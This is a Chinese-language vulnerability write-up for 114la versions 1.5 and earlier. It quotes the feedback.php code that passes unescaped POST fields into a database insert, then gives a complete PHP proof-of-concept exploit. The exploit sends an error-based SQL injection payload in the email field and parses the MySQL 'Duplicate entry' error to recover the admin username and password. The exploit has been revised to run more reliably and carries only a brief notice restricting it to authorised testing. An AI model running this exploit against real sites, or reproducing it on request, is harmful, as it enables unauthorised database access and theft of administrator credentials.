漏洞文件 feedback/feedback.php
影响版本：<= 1.5。漏洞代码（feedback/feedback.php 中处理反馈提交并入库的片段，节选；用户输入仅经过 strip_tags/htmlspecialchars 等 HTML 过滤，未做任何 SQL 转义或参数化即传入 app_db::insert）:
- // NOTE(review): excerpt from feedback.php (version <= 1.5). The enclosing function / try block,
- // $error_msg, $old_cookie, SUBMIT_ONE_DAY, URL and app_db are all defined outside this excerpt.
- // "emptyempty" appears to be a page rendering artifact for PHP's empty(); read it as empty().
- //
- // Input handling: every POST field is transcoded UTF-8 -> GBK and then only strip_tags()'d.
- // strip_tags()/htmlspecialchars() are HTML-context filters; nothing in this excerpt quotes or
- // parameterises the values for SQL before they reach app_db::insert() below.
- // iconv() returns false on an invalid byte sequence; in non-strict mode strip_tags(false) is ''.
- $username = emptyempty($_POST['username']) ? '' : strip_tags(iconv('UTF-8', 'GBK', $_POST['username']));
- // email: no format validation (no filter_var) and no SQL escaping at all -- this is the field the
- // exploit below uses to carry its SQL fragment, which passes through here verbatim.
- $email = (isset($_POST['email'])) ? strip_tags(iconv('UTF-8', 'GBK', $_POST['email'])) : '';
- $content = (isset($_POST['content'])) ? trim(iconv('UTF-8', 'GBK', $_POST['content'])) : '';
- (emptyempty($content)) && $error_msg .= ',意见及建议 ';
-
- if (!emptyempty($error_msg))
- {
- throw new Exception($error_msg, 11);
- }
-
- // Escaped for HTML output only; from an SQL point of view the value is still raw.
- $content = htmlspecialchars($content, ENT_QUOTES);
- // strlen() counts bytes after GBK transcoding and entity encoding (about two bytes per CJK
- // character), so the 40..600 byte window only loosely matches the "20 - 300 字" message.
- if (strlen($content) > 600 || strlen($content) < 40) { throw new Exception('请将您的描述控制在 20 - 300 字,更多内容请您分次提交。', 1); }
- // NOTE(review): as excerpted this is a bare block and throws unconditionally; the guarding
- // condition (presumably comparing $old_cookie against SUBMIT_ONE_DAY) is not visible here.
- {
- throw new Exception('抱歉,24 小时内您只能提交 ' . SUBMIT_ONE_DAY . ' 次反馈信息。谢谢合作!', 2);
- }
- $old_cookie++;
-
- // SQL sink. How app_db::insert() builds the statement is not shown in this excerpt; the exploit
- // below can only work if it interpolates these values into the query string without escaping.
- if (false === app_db::insert('ylmf_feedback', array('username', 'email', 'content', 'add_time'),
- array($username, $email, $content, time())))
- {
- throw new Exception('抱歉,信息提交失败,请重试。', 1);
- }
- else
- {
-
- // The submission rate limit is tracked purely in client-controlled cookies (fdnum / fdstime),
- // so a client can reset it at will. Note the name mismatch: the window start is read from
- // 'fdstime' here and on the else branch, but written as 'dfstime' below, so the 24h window
- // cookie is never set under the name that is checked.
- if ($old_cookie > SUBMIT_ONE_DAY || !isset($_COOKIE['fdstime']) || $_COOKIE['fdstime'] < 1)
- {
- setcookie('dfstime', time(), time() + 86400);
- setcookie('fdnum', $old_cookie, time() + 86400);
- }
- else
- {
- // $_COOKIE['fdstime'] is used in arithmetic with no validation beyond the >= 1 check above.
- setcookie('fdnum', $old_cookie, time() + 86400 - (time() - $_COOKIE['fdstime']));
- }
-
- // Success is signalled by throwing (code 3) with an HTML snippet as the message; URL is a constant.
- throw new Exception('
- <div class="success">提交成功,感谢您的反馈! <a href="'. URL .'/">返回首页</a></div>
- ', 3);
- // Unreachable: the throw above leaves the block before this line runs.
- unset($username, $email, $content);
- }
EXP 代码（基于错误回显的注入 PoC：依赖目标页面把 MySQL 的 "Duplicate entry" 报错信息输出到响应中；仅可用于已获授权的测试）:
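- <?php
- // 114la <= 1.5 feedback/feedback.php SQL injection PoC (original credit: xZL / 0kee, 2011-04-02).
- // Error-based injection: the response body is expected to leak a MySQL "Duplicate entry" error
- // whose value is name_password of the first ylmf_admin_user row. Only run against systems you
- // are authorised to test.
- $sbcopyright='
- ----------------------------------------
- 114la feedback injection Vul Exploit
- By xZL
- Team: www.0kee.com
- 2011.04.02
-
- Usage: php '.$argv[0].' host /path
- Example: php '.$argv[0].' www.nxadmin.com /
- ----------------------------------------
- ';
- // Usage error: print the banner to STDERR and exit non-zero so scripted callers can tell a
- // usage failure from a normal run (the original printed to STDOUT and exited 0).
- if ($argc < 3) {
-     fwrite(STDERR, $sbcopyright);
-     exit(1);
- }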
-
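- ob_start();
- $host = $argv[1];
- // Normalise the path prefix so an argument of "/" does not yield "//feedback/feedback.php".
- $prefix = '/' . trim($argv[2], '/');
- if ($prefix === '/') {
-     $prefix = '';
- }
-
- // Plain HTTP on port 80 only; HTTPS targets are not supported by this PoC.
- $sock = fsockopen($host, 80, $errno, $errstr, 30);
- if (!$sock) die("$errstr ($errno)\n");
- // Bound the reads below so a silent server cannot hang the script indefinitely.
- stream_set_timeout($sock, 30);
-
- // Payload: username ends in a multibyte character followed by a quote (the page transcodes
- // input to GBK before storing it); email carries the error-based subquery (rand(0)/GROUP BY
- // duplicate-key trick) that surfaces name_password of the first ylmf_admin_user row inside
- // the MySQL error text.
- $data = "username=0kee%E7%B8%97'&email=,0,(select%201%20from%20(select%20count(*),concat((SELECT%20concat(name,0x5f,password)%20FROM%20ylmf_admin_user limit 0,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a),2)#&content=~~~~~this is a test from 0kee security team~~~~~";
-
- // HTTP/1.0 with Connection: Close so the server neither chunks the body nor keeps the
- // connection open: the body is read until EOF below, and with the original's HTTP/1.1 +
- // Keep-Alive that read blocked until the server's idle timeout. Accept-Encoding is deliberately
- // not sent: a gzip'd body would never match the 'Duplicate entry' marker. The original's
- // unrelated ASPSESSIONID cookie header has been dropped.
- $request = "POST $prefix/feedback/feedback.php HTTP/1.0\r\n"
-     . "Host: $host\r\n"
-     . "Accept: */*\r\n"
-     . "Referer: http://$host/#M\r\n"
-     . "Accept-Language: zh-cn\r\n"
-     . "Content-Type: application/x-www-form-urlencoded\r\n"
-     . "User-Agent: Mozilla\r\n"
-     . "Content-Length: " . strlen($data) . "\r\n"
-     . "Connection: Close\r\n"
-     . "Cache-Control: no-cache\r\n\r\n"
-     . $data;
- if (fwrite($sock, $request) === false) {
-     fclose($sock);
-     die("request write failed\n");
- }
-
- // Response headers: read up to the first blank line. fgets() returns false at EOF, which also
- // ends the loop (the original's truthiness test would also have stopped on a line equal to "0").
- $headers = "";
- while (($line = fgets($sock, 4096)) !== false && trim($line) !== '') {
-     $headers .= trim($line) . "\n";
- }
- echo "\n";
- // Response body: everything up to EOF.
- $body = "";
- while (!feof($sock)) {
-     $chunk = fgets($sock, 4096);
-     if ($chunk === false) {
-         break;
-     }
-     $body .= $chunk;
- }
-
- fclose($sock);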
-
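- // The error-based payload relies on the target echoing the MySQL error text
- // ("Duplicate entry 'NAME_PASSWORD1' for key ...") into the page. With error display off the
- // injection may still execute server-side but nothing is recoverable from the response here.
- // '[^']*' keeps the match inside the quoted value; the original's greedy '(.*)1' could run on
- // to any later "1'" in the body.
- if (preg_match("/Duplicate entry '([^']*)1'/", $body, $m) === 1) {
-     // The leaked value is name . '_' . password. The password column is assumed to contain no
-     // '_' (e.g. an md5 hex digest -- not verifiable from here), so split on the LAST '_' to keep
-     // an underscore-containing username intact; the original split on the first one.
-     $sep = strrpos($m[1], '_');
-     $adminName = ($sep === false) ? $m[1] : substr($m[1], 0, $sep);
-     $adminPass = ($sep === false) ? '' : substr($m[1], $sep + 1);
-     print_r("Exploit Success! \nusername:" . $adminName . "\npassword:" . $adminPass . "\nGood Luck!");
- } else {
-     print_r("Exploit Failed! \n");
- }
-
- ob_end_flush();
- ?>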